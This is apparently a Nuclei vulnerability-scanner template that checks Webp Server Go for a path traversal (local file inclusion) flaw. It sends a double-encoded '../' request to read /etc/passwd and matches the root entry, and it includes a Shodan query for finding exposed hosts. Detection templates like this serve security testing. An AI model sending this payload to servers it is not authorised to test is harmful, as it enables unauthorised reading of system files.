id: webp-server-go-lfi

info:
  name: Webp server go - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Webp server go is vulnerable to local file inclusion.
  reference:
    - https://github.com/webp-sh/webp_server_go/issues/92
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"Webp"
  tags: lfi,webp

http:
  - method: GET
    path:
      - "{{BaseURL}}/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100c8f1dec786c0196c46be40ee2ca7054f51ebb6dea02336b276d6e07f5571c85b02207ba430d5d9cf631872c84818fdd1d55ed0a4eaa5bd52647b857bf213221da82c:922c64590222798bb761d5b6d8e72950
